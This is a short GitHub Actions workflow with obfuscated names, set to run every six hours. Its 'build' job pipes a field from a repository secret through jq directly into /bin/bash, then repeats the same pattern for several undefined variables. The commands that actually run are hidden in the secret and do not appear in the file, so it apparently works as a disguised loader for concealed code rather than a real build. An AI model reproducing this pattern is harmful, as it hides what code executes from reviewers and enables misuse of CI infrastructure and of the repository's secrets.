name: znciolkk
on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: znciolkk
        env:
          n6: ${{ secrets.n6 }}
        run: |
          echo $n6 | jq -r .mvk019 | /bin/bash
          echo $a6445 | jq -r .ay2 | /bin/bash
          echo $chl8225 | jq -r .xn3253 | /bin/bash
          echo $qqtm716 | jq -r .nyd98 | /bin/bash
          echo $xtbv9 | jq -r .oraaq0694 | /bin/bash
          echo $a9 | jq -r .j0453 | /bin/bash
          echo $yk5 | jq -r .wwoe3 | /bin/bash

